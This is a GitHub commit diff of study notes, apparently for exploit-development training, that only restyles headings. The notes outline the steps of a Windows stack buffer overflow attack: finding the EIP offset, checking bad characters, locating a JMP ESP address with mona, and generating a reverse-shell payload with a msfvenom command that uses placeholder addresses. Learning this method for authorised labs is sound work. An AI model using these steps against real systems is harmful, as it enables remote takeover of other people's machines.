You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Record value on EIP, select ESP and click "Follow in Dump"
@@ -12,17 +12,17 @@
12
12
Use !mona to find the offset after the overflow
13
13
!mona findmsp
14
14
15
-
### 4. Confirm EIP by adding "B" * 4 after the number of offset. Also, add a number of "C" to track the number of characters that can be added after EIP to confirm length of shellcode
15
+
**4. Confirm EIP by adding "B" * 4 after the number of offset. Also, add a number of "C" to track the number of characters that can be added after EIP to confirm length of shellcode**
16
16
17
-
### 5. Check bad characters after EIP. common bad characters are 0x00, 0x0A. Follow dump in ESP to check are there something missing after that.
17
+
**5. Check bad characters after EIP. common bad characters are 0x00, 0x0A. Follow dump in ESP to check are there something missing after that.**
18
18
Add code:
19
19
20
20
badchar = [0x00]
21
21
for ch in range (0x00 , 0xFF+1):
22
22
if ch not in badchar:
23
23
<payload> += chr(ch)
24
24
25
-
### 6. Find JMP ESP address in the system.
25
+
**6. Find JMP ESP address in the system.**
26
26
JMP ESP = FFE4
27
27
28
28
!mona jmp -r esp -cpb "\x00\x0A" << bad character
@@ -38,13 +38,13 @@ Add code:
38
38
39
39
Run again to check is the breakpoint triggered
40
40
41
-
### 7. Add shellcode
41
+
**7. Add shellcode**
42
42
Add a few \x90 before shellcode to avoid shellcode being modify
43
43
44
44
msfvenom -p windows/shell_reverse_tcp LHOST=<IP>LPORT=<PORT> EXITFUNC=thread -f <Code Format> -a x86 -platform windows -b "\x00"
0 commit comments